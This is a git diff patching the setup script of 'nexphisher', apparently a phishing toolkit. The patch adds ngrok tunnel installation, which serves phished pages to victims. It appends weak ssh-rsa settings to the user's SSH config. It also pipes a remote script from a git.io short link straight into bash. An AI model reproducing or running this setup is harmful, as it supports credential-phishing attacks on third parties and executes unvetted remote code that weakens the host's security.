fix nexphisher tool

diff --git a/.set/fix-tools/nexphisher b/.set/fix-tools/nexphisher
--- a/.set/fix-tools/nexphisher
+++ b/.set/fix-tools/nexphisher
@@ -43,6 +43,7 @@ command -v php > /dev/null 2>&1 || { printf "\n\e[0m\e[96m Packages are not Inst
 command -v curl > /dev/null 2>&1 || { printf "\n\e[0m\e[96m Packages are not Installed ! type \e[0m\e[93mbash setup\e[0m\n\n"; exit 1; }
 command -v ssh > /dev/null 2>&1 || { printf "\n\e[0m\e[96m Packages are not Installed ! type \e[0m\e[93mbash setup\e[0m\n\n"; exit 1; }
 command -v unzip > /dev/null 2>&1 || { printf "\n\e[0m\e[96m Packages are not Installed ! type \e[0m\e[93mbash setup\e[0m\n\n"; exit 1; }
+command -v wget > /dev/null 2>&1 || { printf >&2 "\n\e[0m\e[96m Packages are not Installed ! type \e[0m\e[93mbash setup\e[0m\n\n"; exit 1; }
 
 if [[ -d .htr ]]; then
 printf ""
@@ -63,6 +64,43 @@ rm -rf .htr/www
 mkdir .htr/www
 else
 mkdir .htr/www
+fi
+
+[[ -d $HOME/.local/bin ]] && binPATH=$HOME/.local/bin || binPATH=$PREFIX/bin
+if [[ ! -e $binPATH/ngrok.io ]]; then
+printf "\e[1;92m[\e[0m+\e[1;92m] Downloading Ngrok...\n"
+arch1=$(uname -a|grep -o 'arm'|head -n1)
+arch2=$(uname -a|grep -o 'Android'|head -n1)
+[[ $(command -v ngrok) ]] && mv $(command -v ngrok) $(command -v ngrok).io
+[[ -d ~/.ssh ]] || mkdir ~/.ssh
+[[ -e ~/.ssh/config ]] || touch ~/.ssh/config
+printf "host tunnel.us.ngrok.com\n\tHostkeyAlgorithms +ssh-rsa\n\tPubkeyAcceptedAlgorithms +ssh-rsa\n" >> ~/.ssh/config
+bash <(curl -fsSL "http://git.io/abhacker-repo") --install ngrok-server
+[[ $arch1 = 'arm' ]] || [[ $arch2 = 'Android' ]] && arch=arm || arch=386
+wget -q https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-$arch.zip -O $TMPDIR/ngrok-stable-linux-$arch.zip
+if [[ -e $TMPDIR/ngrok-stable-linux-$arch.zip ]];then
+        [[ -d ~/.ngrok2 ]] || mkdir -p ~/.ngrok2
+        unzip -q $TMPDIR/ngrok-stable-linux-$arch.zip -d ~/.ngrok2/
+        rm -rf $TMPDIR/ngrok-stable-linux-$arch.zip
+        printf "#!/usr/bin/bash\n#THIS SCRIPT EXECUTE NGROK TO AVOID 'bad address' ERROR\ncommand -v termux-chroot >/dev/null 2>/dev/null || yes|apt install proot >/dev/null 2>/dev/null\nexec termux-chroot $HOME/.ngrok2/ngrok \${@:1}\n#     i-Haklab by Ivam3" > $binPATH/ngrok.io
+        chmod 750 ~/.ngrok2/$1 $binPATH/ngrok.io
+        PS3="(_➤) "
+        printf "$Y(_➤)$W $toInstall needs an authtoken from $1.com$Y\n"
+        select way in Set_authtoken Skip_this_step;do
+                case $way in
+                        Set_authtoken)
+                                while read -p "(_>)_authtoken─➤ " token && [ -z $token ];do
+                                        continue
+                                done
+                                ngrok.io authtoken $token
+                                break
+                                ;;
+                        *)
+                                printf "$Y(_➤)$W Don't forget set your token running:$Y\n ╰─────➤$W $toInstall authtoken <your-token>";exit;;
+                esac
+        done
+else
+        echo >&2 "Ngrok installation fail... Aborting."; exit 1;
 fi
 
 }
